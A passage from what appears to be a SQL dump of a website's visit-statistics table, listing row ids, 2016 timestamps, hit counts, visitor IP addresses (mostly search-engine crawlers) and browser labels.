,'66.249.66.47',''),(26008,1458893265,1,0,1,0,'66.249.78.51',''),(26009,1458893285,1,0,1,0,'66.249.78.65',''),(26010,1458893433,2,2,0,0,'193.19.84.90','other'),(26011,1458893479,1,1,0,0,'141.8.184.22','other'),(26012,1458893483,1,1,0,0,'141.8.184.11','other'),(26013,1458893487,1,1,0,0,'141.8.132.10','other'),(26014,1458893491,1,1,0,0,'5.255.253.9','other'),(26015,1458894115,1,1,0,0,'217.69.133.223','other'),(26016,1458894333,1,1,0,0,'207.46.13.168','other'),(26017,1458894410,1,1,0,0,'212.22.195.15','firefox'),(26018,1458894469,1,1,0,0,'93.158.152.9','other'),(26019,1458894474,1,1,0,0,'5.255.253.53','other'),(26020,1458894477,1,1,0,0,'130.193.50.4','other'),(26021,1458894692,1,1,0,0,'66.249.78.51','other'),(26022,1458895000,1,1,0,0,'141.0.15.61','other'),(26023,1458895141,1,1,0,0,'217.69.143.58','other'),(26024,1458895300,1,1,0,0,'207.46.13.168','other'),(26025,1458895370,3,2,1,0,'66.249.78.65',''),(26026,1458895386,1,1,0,0,'37.55.56.154','chrome'),(26027,1458895552,1,1,0,0,'130.193.37.21','other'),(26028,1458895605,1,0,1,0,'66.249.78.51',''),(26029,1458895822,1,1,0,0,'217.69.143.71','other'),(26030,1458896023,1,1,0,0,'66.249.78.51','other'),(26031,1458896075,2,1,1,0,'66.249.78.58',''),(26032,1458896199,1,1,0,0,'217.69.143.48','other'),(26033,1458896738,1,1,0,0,'93.158.152.26','other'),(26034,1458896742,1,1,0,0,'178.154.149.11','other'),(26035,1458896789,1,1,0,0,'62.210.215.100','chrome'),(26036,1458897045,1,1,0,0,'217.69.133.228','other'),(26037,1458897158,1,1,0,0,'5.255.253.100','other'),(26038,1458897365,1,1,0,0,'217.69.133.68','other'),(26039,1458897385,1,0,1,0,'66.249.78.51',''),(26040,1458897516,1,0,1,0,'66.249.78.58',''),(26041,1458897967,1,1,0,0,'8.29.198.26','other'),(26042,1458898269,1,1,0,0,'217.69.133.84','other'),(26043,1458898374,1,1,0,0,'5.255.253.47','other'),(26044,1458898851,2,0,2,0,'66.249.78.51',''),(26045,1458898950,2,2,0,0,'217.69.133.216','other'),(26046,1458899057,1,0,1,0,'66.249.78.58',''),(26047,1458899134,1,0,1,0,'66.249.78.65',''),(26048,1458899183,1,1,0,0,'66.102.9.86','chrome'),(26049,1458899206,1,1,0,0,'66.249.78.51','other'),(26050,1458899207,2,2,0,0,'5.255.253.113','other'),(26051,1458899270,1,1,0,0,'217.69.143.69','other'),(26052,1458899555,1,1,0,0,'217.69.143.58','other'),(26053,1458899560,1,1,0,0,'130.193.50.4','other'),(26054,1458899771,1,1,0,0,'40.77.167.37','other'),(26055,1458899835,2,2,0,0,'66.249.78.65','other'),(26056,1458900042,1,1,0,0,'94.179.94.148','firefox'),(26057,1458900140,1,1,0,0,'217.69.133.226','other'),(26058,1458900147,1,1,0,0,'91.196.179.69','firefox'),(26059,1458900207,2,0,2,0,'66.249.78.51',''),(26060,1458900232,1,0,1,0,'66.249.78.113',''),(26061,1458900254,1,0,1,0,'66.249.78.58',''),(26062,1458900438,4,4,0,0,'5.9.87.111','other'),(26063,1458900741,1,1,0,0,'217.69.133.85','other'),(26064,1458900802,1,1,0,0,'95.158.0.220','firefox'),(26065,1458900804,1,1,0,0,'195.211.175.37','chrome'),(26066,1458900878,1,0,1,0,'66.249.78.99',''),(26067,1458900922,1,1,0,0,'91.196.178.68','firefox'),(26068,1458901133,1,1,0,0,'66.249.66.74','other'),(26069,1458901327,1,1,0,0,'66.249.78.113','other'),(26070,1458901376,1,1,0,0,'66.249.78.106','other'),(26071,1458901392,1,1,0,0,'5.255.253.47','other'),(26072,1458901396,1,1,0,0,'93.158.152.75','other'),(26073,1458901400,1,1,0,0,'141.8.132.10','other'),(26074,1458901405,1,1,0,0,'5.255.253.36','other'),(26075,1458901440,1,1,0,0,'66.249.78.99','other'),(26076,1458901477,2,1,1,0,'66.249.78.58',''),(26077,1458901688,2,1,1,0,'66.249.78.65',''),(26078,1458901725,1,1,0,0,'66.249.92.46','other'),(26079,1458901814,1,0,1,0,'68.180.228.27',''),(26080,1458901979,1,1,0,0,'217.69.143.46','other'),(26081,1458901981,3,0,3,0,'66.249.78.51',''),(26082,1458902024,1,1,0,0,'207.46.13.168','other'),(26083,1458902426,2,1,1,0,'66.249.78.58',''),(26084,1458902434,1,1,0,0,'91.196.177.134','chrome'),(26085,1458902756,1,1,0,0,'217.69.133.227','other'),(26086,1458902786,1,1,0,0,'66.249.78.65','other'),(26087,1458902881,2,2,0,0,'130.193.51.74','other'),(26088,1458902885,2,2,0,0,'141.8.132.52','other'),(26089,1458902889,1,1,0,0,'5.255.253.36','other'),(26090,1458902894,1,1,0,0,'178.154.149.11','other'),(26091,1458902933,1,0,1,0,'66.249.78.51',''),(26092,1458902956,1,1,0,0,'66.249.78.99','other'),(26093,1458903034,4,1,3,0,'66.249.78.51',''),(26094,1458903304,1,1,0,0,'141.8.142.10','other'),(26095,1458903308,1,1,0,0,'5.255.253.9','other'),(26096,1458903312,1,1,0,0,'130.193.51.81','other'),(26097,1458903316,1,1,0,0,'5.255.253.113','other'),(26098,1458903321,1,1,0,0,'141.8.132.41','other'),(26099,1458903325,1,1,0,0,'5.255.253.47','other'),(26100,1458903333,1,1,0,0,'130.193.50.4','other'),(26101,1458903338,1,1,0,0,'141.8.142.62','other'),(26102,1458903342,1,1,0,0,'130.193.50.32','other'),(26103,1458903535,1,0,1,0,'66.249.66.47',''),(26104,1458903601,1,1,0,0,'207.46.13.53','other'),(26105,1458904006,1,1,0,0,'217.69.133.228','other'),(26106,1458904007,1,1,0,0,'217.69.133.69','other'),(26107,1458904022,1,0,1,0,'66.249.78.58',''),(26108,1458904044,1,1,0,0,'217.69.133.67','other'),(26109,1458904116,1,1,0,0,'217.69.143.58','other'),(26110,1458904242,1,0,1,0,'66.249.78.99',''),(26111,1458904385,1,1,0,0,'217.69.133.221','other'),(26112,1458904386,1,1,0,0,'217.69.133.223','other'),(26113,1458904531,152,152,0,0,'69.30.218.202','other'),(26114,1458904933,1,0,1,0,'66.249.78.58',''),(26115,1458905002,1,1,0,0,'217.69.133.218','other'),(26116,1458905004,1,1,0,0,'217.69.133.215','other'),(26117,1458905201,1,0,1,0,'66.249.78.65',''),(26118,1458905517,1,1,0,0,'66.249.78.58','other'),(26119,1458905527,1,1,0,0,'180.76.15.149','other'),(26120,1458905528,1,1,0,0,'77.247.181.165','chrome'),(26121,1458905624,2,1,1,0,'66.249.78.65',''),(26122,1458905692,1,0,1,0,'66.249.78.51',''),(26123,1458905725,3,3,0,0,'69.197.163.198','other'),(26124,1458906105,1,1,0,0,'78.111.185.84','firefox'),(26125,1458906122,1,1,0,0,'141.8.132.99','other'),(26126,1458906126,2,2,0,0,'91.196.178.72','firefox'),(26127,1458906163,1,1,0,0,'66.249.66.50','other'),(26128,1458906225,1,1,0,0,'91.196.178.169','chrome'),(26129,1458906284,1,1,0,0,'130.193.50.4','other'),(26130,1458906430,1,1,0,0,'217.69.143.54','other'),(26131,1458906557,3,1,2,0,'66.249.78.51',''),(26132,1458906701,1,1,0,0,'141.8.142.62','other'),(26133,1458906705,1,1,0,0,'217.69.143.51','other'),(26134,1458906763,1,1,0,0,'66.249.78.65','other'),(26135,1458906802,1,0,1,0,'66.249.78.58',''),(26136,1458906890,2,2,0,0,'66.249.66.47','other'),(26137,1458906914,1,1,0,0,'207.46.13.53','other'),(26138,1458906945,1,1,0,0,'62.210.215.100','chrome'),(26140,1458906978,1,1,0,0,'217.69.133.217','other'),(26141,1458907000,4,1,3,0,'66.249.78.58',''),(26142,1458907003,1,0,1,0,'66.249.78.106',''),(26143,1458907005,1,1,0,0,'78.111.185.243','firefox'),(26144,1458907162,1,1,0,0,'91.196.178.72','firefox'),(26145,1458907180,1,1,0,0,'217.69.133.69','other'),(26146,1458907342,1,1,0,0,'217.69.133.221','other'),(26148,1458907371,1,1,0,0,'217.69.133.237','other'),(26149,1458907560,2,0,2,0,'66.249.78.51',''),(26150,1458907663,1,1,0,0,'91.214.211.66','chrome'),(26151,1458907755,1,1,0,0,'91.196.178.100','chrome'),(26152,1458907972,1,1,0,0,'217.69.143.71','other'),(26153,1458908039,3,0,3,0,'66.249.78.65',''),(26154,1458908162,1,1,0,0,'40.77.167.37','other'),(26155,1458908235,1,0,1,0,'66.249.78.58',''),(26156,1458908282,1,0,1,0,'66.249.78.106',''),(26157,1458908288,2,0,2,0,'66.249.66.47',''),(26158,1458908615,2,1,1,0,'66.249.78.58',''),(26159,1458908717,1,1,0,0,'91.196.178.68','chrome'),(26160,1458908844,1,1,0,0,'8.29.198.25','other'),(26161,1458909519,1,0,1,0,'66.249.66.44',''),(26162,1458909684,1,1,0,0,'217.69.143.56','other'),(26163,1458910159,1,1,0,0,'217.69.143.44','other'),(26164,1458910160,1,1,0,0,'217.69.143.47','other'),(26165,1458910187,1,1,0,0,'217.69.133.222','other'),(26166,1458910263,1,1,0,0,'66.249.66.50','other'),(26167,1458910519,1,1,0,0,'217.69.143.66','other'),(26168,1458910520,1,1,0,0,'91.196.178.132','firefox'),(26169,1458910860,2,0,2,0,'66.249.78.65',''),(26170,1458910935,4,4,0,0,'46.4.87.105','other'),(26171,1458911336,1,1,0,0,'217.69.133.238','other'),(26173,1458911665,1,1,0,0,'66.249.66.47','other'),(26174,1458911748,2,0,2,0,'66.249.78.58',''),(26175,1458911854,1,1,0,0,'180.76.15.159','other'),(26176,1458912008,1,1,0,0,'217.69.133.67','other'),(26177,1458912009,1,1,0,0,'217.69.133.84','other'),(26178,1458912033,1,1,0,0,'91.196.178.169','chrome'),(26179,1458912194,1,1,0,0,'217.69.133.9','other'),(26180,1458912195,1,1,0,0,'217.69.133.3','other'),(26181,1458912197,1,1,0,0,'217.69.133.194','other'),(26182,1458912257,1,1,0,0,'130.193.50.4','other'),(26183,1458912266,1,1,0,0,'91.196.178.68','chrome'),(26184,1458912566,1,1,0,0,'78.111.190.159','chrome'),(26185,1458912632,1,1,0,0,'217.69.133.69','other'),(26186,1458912633,1,1,0,0,'217.69.133.232','other'),(26187,1458912684,1,1,0,0,'82.145.218.243','other'),(26188,1458912694,1,0,1,0,'66.249.78.65',''),(26189,1458912766,1,1,0,0,'66.249.92.43','other'),(26190,1458912855,1,1,0,0,'178.95.245.6','chrome'),(26191,1458913391,1,1,0,0,'178.154.189.203','other'),(26192,1458913500,1,0,1,0,'66.249.78.106',''),(26193,1458913593,1,1,0,0,'217.69.133.223','other'),(26194,1458913601,1,1,0,0,'107.178.194.104','chrome'),(26195,1458913810,1,1,0,0,'94.179.100.30','firefox'),(26196,1458913849,1,1,0,0,'217.69.133.222','other'),(26197,1458914098,1,0,1,0,'66.249.66.47',''),(26198,1458914250,1,1,0,0,'217.69.133.67','other'),(26199,1458914425,1,1,0,0,'37.55.57.117','firefox'),(26200,1458914432,1,1,0,0,'217.69.133.229','other'),(26201,1458914607,2,0,2,0,'66.249.78.51',''),(26202,1458914630,1,1,0,0,'91.196.178.100','chrome'),(26203,1458914709,1,1,0,0,'91.196.178.69','chrome'),(26204,1458914760,1,0,1,0,'66.249.78.113',''),(26205,1458914834,1,1,0,0,'91.196.178.66','firefox'),(26206,1458914894,1,1,0,0,'94.179.117.251','firefox'),(26207,1458914899,1,0,1,0,'66.249.78.58',''),(26208,1458915067,1,0,1,0,'66.249.78.99',''),(26209,1458915182,1,0,1,0,'66.249.78.65',''),(26210,1458915423,1,1,0,0,'37.55.57.117','firefox'),(26211,1458915607,1,0,1,0,'66.249.78.51',''),(26212,1458915776,1,0,1,0,'66.249.66.47',''),(26213,1458915798,1,1,0,0,'94.179.117.251','firefox'),(26214,1458916226,1,0,1,0,'66.249.78.106',''),(26215,1458916229,3,3,0,0,'78.158.11.226','other'),(26216,1458916230,1,1,0,0,'217.69.133.223','other'),(26217,1458916248,1,1,0,0,'91.196.178.69','firefox'),(26218,1458916375,1,1,0,0,'37.55.57.117','firefox'),(26219,1458916432,1,0,1,0,'66.249.78.58',''),(26220,1458916454,1,0,1,0,'66.249.66.50',''),(26221,1458916556,1,1,0,0,'66.249.93.108','chrome'),(26222,1458916559,1,1,0,0,'180.76.15.140','other'),(26223,1458916797,1,1,0,0,'91.196.178.67','firefox'),(26224,1458917185,1,1,0,0,'188.32.135.172','chrome'),(26225,1458917664,1,1,0,0,'217.69.143.65','other'),(26226,1458917968,1,1,0,0,'62.210.215.100','chrome'),(26227,1458918503,5,0,5,0,'68.180.228.27',''),(26228,1458918584,1,0,1,0,'66.249.66.47',''),(26229,1458918710,1,1,0,0,'207.46.13.53','other'),(26230,1458918915,2,2,0,0,'217.69.133.215','other'),(26231,1458919720,1,1,0,0,'8.29.198.26','other'),(26232,1458919869,1,1,0,0,'207.46.13.53','other'),(26233,1458920169,2,0,2,0,'66.249.78.106',''),(26234,1458920344,1,1,0,0,'178.150.117.250','chrome'),(26235,1458920530,1,0,1,0,'66.249.66.44',''),(26236,1458920540,1,0,1,0,'66.249.78.58',''),(26237,1458920553,1,1,0,0,'40.77.167.37','other'),(26238,1458920563,1,1,0,0,'207.46.13.101','other'),(26239,1458920794,2,0,2,0,'66.249.78.51',''),(26240,1458920873,1,1,0,0,'178.92.8.24','chrome'),(26241,1458920939,2,2,0,0,'207.46.13.53','other'),(26242,1458921176,1,1,0,0,'217.69.133.221','other'),(26243,1458921205,1,0,1,0,'66.249.78.99',''),(26244,1458921245,1,1,0,0,'91.196.178.161','firefox'),(26245,1458921397,1,0,1,0,'66.249.66.47',''),(26246,1458921437,1,1,0,0,'217.69.133.67','other'),(26247,1458921534,1,0,1,0,'66.249.78.65',''),(26248,1458921703,1,0,1,0,'66.249.78.58',''),(26249,1458921737,2,0,2,0,'68.180.228.27',''),(26250,1458922213,1,1,0,0,'91.196.178.161','firefox'),(26251,1458922656,2,2,0,0,'37.55.57.117','firefox'),(26252,1458922724,2,0,2,0,'66.249.78.51',''),(26253,1458923061,1,1,0,0,'217.69.133.67','other'),(26255,1458923129,2,0,2,0,'66.249.78.65',''),(26256,1458923158,1,1,0,0,'94.179.69.253','firefox'),(26257,1458923261,1,1,0,0,'217.69.143.55','other'),(26258,1458923385,1,1,0,0,'66.249.92.43','other'),(26259,1458923461,1,0,1,0,'66.249.78.58',''),(26260,1458923701,1,1,0,0,'217.69.133.230','other'),(26262,1458924057,2,2,0,0,'217.69.143.65','other'),(26263,1458924153,1,1,0,0,'188.162.228.133','firefox'),(26264,1458924285,1,0,1,0,'66.249.78.113',''),(26265,1458924403,1,0,1,0,'68.180.228.27',''),(26266,1458924694,1,1,0,0,'217.69.133.219','other'),(26267,1458924930,1,1,0,0,'217.69.133.225','other'),(26268,1458925343,1,0,1,0,'66.249.78.65',''),(26269,1458925451,1,1,0,0,'217.69.143.54','other'),(26270,1458925563,1,1,0,0,'207.46.13.53','other'),(26271,1458925624,1,0,1,0,'66.249.66.44',''),(26272,1458925992,1,0,1,0,'66.249.78.51',''),(26273,1458926785,2,2,0,0,'40.77.167.37','other'),(26274,1458926925,1,1,0,0,'217.69.133.218','other'),(26275,1458926970,1,1,0,0,'62.210.215.100','chrome'),(26276,1458927168,1,1,0,0,'217.69.133.68','other'),(26277,1458927273,1,1,0,0,'91.196.178.99','firefox'),(26278,1458928110,1,1,0,0,'217.69.133.238','other'),(26279,1458928243,1,1,0,0,'217.69.133.224','other'),(26280,1458928474,1,1,0,0,'37.55.57.117','firefox'),(26281,1458928649,1,1,0,0,'130.180.212.169','chrome'),(26282,1458928692,1,1,0,0,'193.194.127.217','firefox'),(26283,1458928707,1,1,0,0,'46.211.3.139','chrome'),(26284,1458929122,1,1,0,0,'93.158.152.84','other'),(26285,1458929126,1,1,0,0,'130.193.51.79','other'),(26286,1458929326,1,1,0,0,'178.154.189.202','other'),(26287,1458929399,1,1,0,0,'66.249.78.65','other'),(26288,1458929421,1,1,0,0,'66.249.78.99','other'),(26289,1458929432,2,2,0,0,'66.249.78.58','other'),(26290,1458929454,2,1,1,0,'66.249.78.51',''),(26291,1458929464,1,1,0,0,'66.249.78.113','other'),(26292,1458929488,2,1,1,0,'66.249.78.51',''),(26293,1458929519,8,6,2,0,'66.249.78.51',''),(26294,1458929620,2,1,1,0,'66.249.66.44',''),(26295,1458929729,2,2,0,0,'5.255.253.113','other'),(26296,1458929786,2,0,2,0,'66.249.66.47',''),(26297,1458929854,3,0,3,0,'68.180.228.27',''),(26298,1458929926,1,1,0,0,'217.69.133.228','other'),(26299,1458930033,1,1,0,0,'40.77.167.37','other'),(26300,1458930557,1,1,0,0,'130.193.51.83','other'),(26301,1458930569,2,0,2,0,'66.249.78.65',''),(26302,1458930617,1,1,0,0,'8.29.198.25','other'),(26303,1458930710,1,1,0,0,'217.69.133.224','other'),(26304,1458930839,1,1,0,0,'91.196.178.70','chrome'),(26305,1458930921,1,1,0,0,'93.158.152.84','other'),(26306,1458930925,2,2,0,0,'5.255.253.113','other'),(26307,1458930936,1,1,0,0,'141.8.132.105','other'),(26308,1458931353,1,1,0,0,'207.46.13.168','other'),(26309,1458931406,1,0,1,0,'66.249.66.47',''),(26310,1458931504,1,1,0,0,'130.193.51.83','other'),(26311,1458931508,1,1,0,0,'141.8.183.25','other'),(26312,1458931513,2,2,0,0,'130.193.50.34','other'),(26313,1458931655,1,1,0,0,'217.69.143.43','other'),(26314,1458931699,1,1,0,0,'66.249.78.51','other'),(26315,1458931730,1,0,1,0,'66.249.66.44',''),(26316,1458931935,2,2,0,0,'141.8.132.105','other'),(26317,1458932179,1,1,0,0,'207.46.13.101','other'),(26318,1458932507,1,1,0,0,'37.55.57.117','firefox'),(26319,1458932565,1,1,0,0,'217.69.133.218','other'),(26320,1458932674,1,0,1,0,'66.249.78.51',''),(26321,1458932718,1,0,1,0,'66.249.66.44',''),(26322,1458932733,1,1,0,0,'130.193.50.34','other'),(26323,1458932796,1,0,1,0,'66.249.66.47',''),(26324,1458933263,1,1,0,0,'5.255.253.67','other'),(26325,1458933579,1,1,0,0,'91.196.178.168','chrome'),(26326,1458933692,2,2,0,0,'141.8.143.172','other'),(26327,1458933706,1,1,0,0,'66.249.92.43','other'),(26328,1458933993,1,1,0,0,'217.69.133.217','other'),(26329,1458933994,1,1,0,0,'217.69.133.216','other'),(26330,1458934013,1,1,0,0,'78.111.186.68','chrome'),(26331,1458934233,1,1,0,0,'40.77.167.37','other'),(26332,1458934244,5,5,0,0,'130.193.50.34','other'),(26333,1458934263,1,1,0,0,'180.153.236.127','msie'),(26334,1458934438,1,1,0,0,'217.69.133.222','other'),(26335,1458934604,1,1,0,0,'217.69.143.62','other'),(26336,1458934866,3,0,3,0,'68.180.231.29',''),(26337,1458934874,1,0,1,0,'66.249.78.58',''),(26338,1458934943,2,2,0,0,'141.8.142.58','other'),(26339,1458934947,1,1,0,0,'130.193.51.19','other'),(26340,1458934974,1,1,0,0,'141.8.132.105','other'),(26341,1458934978,2,2,0,0,'141.8.183.25','other'),(26342,1458935148,1,1,0,0,'78.111.186.68','chrome'),(26343,1458935195,1,1,0,0,'194.44.197.75','chrome'),(26344,1458935437,1,1,0,0,'141.8.142.67','other'),(26345,1458935696,1,1,0,0,'78.111.186.240','chrome'),(26346,1458935776,1,0,1,0,'66.249.66.44',''),(26347,1458935843,1,0,1,0,'66.249.66.50',''),(26348,1458935929,1,1,0,0,'92.112.167.7','chrome'),(26349,1458936056,1,1,0,0,'141.8.183.25','other'),(26350,1458936105,1,1,0,0,'141.8.142.58','other'),(26351,1458936109,3,3,0,0,'130.193.51.83','other'),(26352,1458936113,1,1,0,0,'130.193.50.34','other'),(26353,1458936127,1,1,0,0,'217.69.133.221','other'),(26354,1458936128,1,1,0,0,'217.69.133.220','other'),(26355,1458936515,1,1,0,0,'194.44.197.75','chrome'),(26356,1458936689,1,1,0,0,'217.69.143.58','other'),(26357,1458936690,1,1,0,0,'5.255.253.113','other'),(26358,1458936709,1,1,0,0,'5.255.253.47','other'),(26359,1458936714,1,1,0,0,'141.8.142.62','other'),(26360,1458936723,1,1,0,0,'141.8.132.30','other'),(26361,1458936727,1,1,0,0,'5.255.253.68','other'),(26362,1458936751,1,1,0,0,'93.158.152.51','other'),(26363,1458936755,1,1,0,0,'130.193.50.32','other'),(26364,1458936759,1,1,0,0,'130.193.50.38','other'),(26365,1458936904,1,1,0,0,'217.69.133.215','other'),(26366,1458937145,1,1,0,0,'207.46.13.168','other'),(26367,1458937251,1,1,0,0,'130.193.50.4','other'),(26368,1458937336,1,1,0,0,'91.196.178.162','chrome'),(26369,1458937405,1,1,0,0,'5.255.253.10','other'),(26370,1458937410,1,1,0,0,'130.193.51.43','other'),(26371,1458937492,4,4,0,0,'163.172.13.244','other'),(26372,1458937503,1,0,1,0,'68.180.231.29',''),(26373,1458937569,1,1,0,0,'217.69.133.218','other'),(26374,1458937592,1,1,0,0,'62.210.215.100','chrome'),(26375,1458937641,2,2,0,0,'217.69.133.229','other'),(26376,1458937848,2,2,0,0,'141.8.132.2','other'),(26377,1458937860,1,1,0,0,'130.193.51.45','other'),(26378,1458937872,2,2,0,0,'130.193.50.32','other'),(26379,1458937904,1,1,0,0,'93.158.152.61','other'),(26380,1458937909,2,2,0,0,'141.8.142.58','other'),(26381,1458937915,1,1,0,0,'93.158.152.9','other'),(26382,1458937920,1,1,0,0,'141.8.142.78','other'),(26383,1458938114,1,0,1,0,'66.249.64.233',''),(26384,1458938139,1,1,0,0,'130.193.51.19','other'),(26385,1458938232,1,0,1,0,'66.249.64.223',''),(26386,1458938514,1,1,0,0,'93.158.152.51','other'),(26387,1458938518,1,1,0,0,'141.8.183.14','other'),(26388,1458938587,1,1,0,0,'141.8.132.99','other'),(26389,1458938625,1,1,0,0,'91.196.178.162','chrome'),(26390,1458938926,1,1,0,0,'207.46.13.101','other'),(26391,1458939017,1,0,1,0,'68.180.231.29',''),(26392,1458939091,1,1,0,0,'141.8.142.78','other'),(26393,1458939225,2,2,0,0,'176.36.80.39','other'),(26394,1458939250,1,1,0,0,'91.196.178.66','firefox'),(26395,1458939438,1,1,0,0,'93.158.152.84','other'),(26396,1458939458,1,0,1,0,'66.249.64.233',''),(26397,1458939547,1,1,0,0,'66.249.64.223','other'),(26398,1458939569,1,1,0,0,'217.69.133.220','other'),(26399,1458939683,1,1,0,0,'141.8.142.58','other'),(26400,1458939825,1,0,1,0,'66.249.64.228',''),(26401,1458939995,1,1,0,0,'91.196.178.162','chrome'),(26402,1458940155,1,1,0,0,'207.46.13.101','other'),(26403,1458940183,1,1,0,0,'217.69.133.237','other'),(26404,1458940353,1,1,0,0,'141.8.142.78','other'),(26405,1458940358,1,1,0,0,'130.193.50.4','other'),(26406,1458940362,1,1,0,0,'5.255.253.36','other'),(26407,1458940513,1,1,0,0,'66.249.64.233','other'),(26408,1458940835,1,0,1,0,'66.249.64.156',''),(26409,1458940921,1,1,0,0,'93.158.152.75','other'),(26410,1458940925,1,1,0,0,'141.8.132.52','other'),(26411,1458940929,1,1,0,0,'93.158.152.40','other'),(26412,1458940933,1,1,0,0,'130.193.50.6','other'),(26413,1458941474,1,0,1,0,'66.249.64.228',''),(26414,1458941520,2,2,0,0,'141.8.132.2','other'),(26415,1458941525,1,1,0,0,'8.29.198.26','other'),(26416,1458941551,1,1,0,0,'40.77.167.37','other'),(26417,1458941563,1,1,0,0,'217.69.133.237','other'),(26418,1458941588,1,1,0,0,'130.193.50.32','other'),(26419,1458941756,1,1,0,0,'66.249.64.233','other'),(26420,1458942079,1,1,0,0,'217.69.133.220','other'),(26421,1458942298,1,1,0,0,'217.69.143.52','other'),(26422,1458942577,1,1,0,0,'217.69.133.235','other'),(26423,1458942597,1,1,0,0,'130.193.37.21','other'),(26424,1458942620,1,1,0,0,'66.249.64.228','other'),(26425,1458942812,1,1,0,0,'207.46.13.101','other'),(26426,1458942926,2,1,1,0,'66.249.64.233',''),(26427,1458943020,1,1,0,0,'217.69.133.217','other'),(26428,1458943195,1,1,0,0,'217.69.133.69','other'),(26429,1458943410,1,1,0,0,'141.8.142.25','other'),(26430,1458943415,1,1,0,0,'130.193.50.32','other'),(26431,1458943419,1,1,0,0,'93.158.152.46','other'),(26432,1458943578,2,1,1,0,'66.249.64.228',''),(26433,1458943932,5,1,4,0,'66.249.64.223',''),(26434,1458943993,1,1,0,0,'141.8.132.83','other'),(26435,1458944352,1,1,0,0,'217.69.133.224','other'),(26436,1458944353,1,1,0,0,'217.69.133.221','other'),(26437,1458944755,1,1,0,0,'66.249.89.114','other'),(26438,1458944822,1,1,0,0,'178.154.189.37','other'),(26439,1458945238,1,1,0,0,'217.69.133.85','other'),(26440,1458945239,1,1,0,0,'217.69.133.216','other'),(26441,1458945495,1,0,1,0,'68.180.231.29',''),(26442,1458945570,1,1,0,0,'141.8.132.105','other'),(26443,1458945735,1,0,1,0,'66.249.64.162',''),(26444,1458946057,1,1,0,0,'66.249.64.156','other'),(26445,1458946396,1,1,0,0,'141.8.142.67','other'),(26446,1458946575,1,1,0,0,'217.69.133.231','other'),(26447,1458946630,1,1,0,0,'217.69.143.64','other'),(26448,1458946870,1,1,0,0,'217.69.133.230','other'),(26449,1458946971,1,1,0,0,'217.69.133.235','other'),(26450,1458947160,1,1,0,0,'5.255.253.53','other'),(26451,1458947165,2,2,0,0,'141.8.142.61','other'),(26452,1458947169,2,2,0,0,'130.193.51.19','other'),(26453,1458947227,1,1,0,0,'185.44.77.197','firefox'),(26454,1458947315,3,0,3,0,'66.249.64.150',''),(26455,1458947462,1,1,0,0,'141.8.183.19','other'),(26456,1458947483,1,1,0,0,'130.193.51.14','other'),(26457,1458947494,1,1,0,0,'141.8.183.25','other'),(26458,1458947559,1,1,0,0,'217.69.133.250','other'),(26459,1458947970,1,1,0,0,'217.69.133.216','other'),(26460,1458947971,1,1,0,0,'217.69.133.217','other'),(26461,1458948145,1,1,0,0,'217.69.133.225','other'),(26462,1458948164,1,1,0,0,'217.69.133.220','other'),(26463,1458948710,1,0,1,0,'66.249.64.223',''),(26464,1458949088,1,1,0,0,'66.249.64.162','other'),(26465,1458949231,1,1,0,0,'204.79.180.47','msie'),(26466,1458949653,1,1,0,0,'62.210.215.100','chrome'),(26467,1458949880,1,0,1,0,'66.249.64.228',''),(26468,1458950147,1,1,0,0,'141.8.142.61','other'),(26469,1458950249,1,0,1,0,'66.249.64.223',''),(26470,1458950786,1,0,1,0,'66.249.64.228',''),(26471,1458950918,1,1,0,0,'217.69.133.216','other'),(26472,1458951212,1,1,0,0,'40.77.167.37','other'),(26473,1458951239,1,0,1,0,'68.180.231.29',''),(26474,1458951480,1,1,0,0,'217.69.133.68','other'),(26475,1458951490,1,1,0,0,'130.193.50.4','other'),(26476,1458951637,1,1,0,0,'217.69.133.229','other'),(26477,1458951725,1,0,1,0,'66.249.64.223',''),(26478,1458952337,1,1,0,0,'8.29.198.25','other'),(26479,1458952341,1,1,0,0,'217.69.143.65','other'),(26481,1458952549,1,1,0,0,'182.118.21.235','msie'),(26482,1458952646,4,3,1,0,'66.249.64.228',''),(26483,1458952867,1,1,0,0,'180.76.15.11','other'),(26484,1458952947,1,1,0,0,'130.193.51.19','other'),(26485,1458953070,1,0,1,0,'66.249.64.233',''),(26486,1458953421,1,1,0,0,'207.46.13.168','other'),(26487,1458953649,3,2,1,0,'66.249.64.228',''),(26488,1458953676,1,1,0,0,'141.8.132.101','other'),(26489,1458954031,2,2,0,0,'66.249.64.223','other'),(26490,1458954057,1,0,1,0,'66.249.64.162',''),(26491,1458954185,1,1,0,0,'207.46.13.53','other'),(26492,1458954343,1,1,0,0,'66.249.64.228','other'),(26493,1458954416,1,0,1,0,'66.249.64.233',''),(26494,1458954460,3,3,0,0,'66.249.64.233','other'),(26495,1458955543,1,1,0,0,'66.249.64.233','other'),(26496,1458955619,1,1,0,0,'130.193.51.83','other'),(26497,1458955885,1,1,0,0,'66.249.89.114','other'),(26498,1458955942,2,2,0,0,'217.69.143.61','other'),(26499,1458956161,4,4,0,0,'130.193.50.34','other'),(26500,1458956170,1,1,0,0,'141.8.183.25','other'),(26501,1458956179,1,1,0,0,'141.8.132.105','other'),(26502,1458956226,2,1,1,0,'66.249.64.228',''),(26503,1458956668,1,0,1,0,'66.249.64.162',''),(26504,1458956676,1,0,1,0,'66.249.64.150',''),(26505,1458956727,3,2,1,0,'66.249.64.223',''),(26506,1458956941,2,2,0,0,'217.69.133.231','other'),(26507,1458956942,1,1,0,0,'217.69.133.220','other'),(26508,1458957130,1,0,1,0,'66.249.64.233',''),(26509,1458957180,1,1,0,0,'66.249.64.223','other'),(26510,1458957242,1,1,0,0,'207.46.13.168','other'),(26511,1458957309,2,1,1,0,'66.249.64.228',''),(26512,1458957708,1,0,1,0,'68.180.231.29',''),(26513,1458957763,2,2,0,0,'217.69.133.229','other'),(26514,1458958024,1,1,0,0,'217.69.133.85','other'),(26515,1458958025,1,1,0,0,'217.69.133.216','other'),(26516,1458958095,1,1,0,0,'217.69.143.62','other'),(26517,1458958096,1,1,0,0,'217.69.143.67','other'),(26518,1458958445,1,1,0,0,'217.69.143.45','other'),(26519,1458958455,1,0,1,0,'66.249.64.150',''),(26520,1458958769,1,1,0,0,'217.69.133.225','other'),(26521,1458958899,1,1,0,0,'217.69.133.191','other'),(26522,1458958900,1,1,0,0,'217.69.133.248','other'),(26523,1458958944,3,0,3,0,'66.249.64.223',''),(26524,1458959120,1,0,1,0,'66.249.64.228',''),(26525,1458959182,1,1,0,0,'217.69.133.224','other'),(26526,1458959270,1,1,0,0,'93.158.152.202','other'),(26527,1458959273,1,1,0,0,'178.154.189.202','other'),(26528,1458959591,3,2,1,0,'66.249.64.223',''),(26529,1458959915,1,1,0,0,'62.210.215.100','chrome'),(26530,145895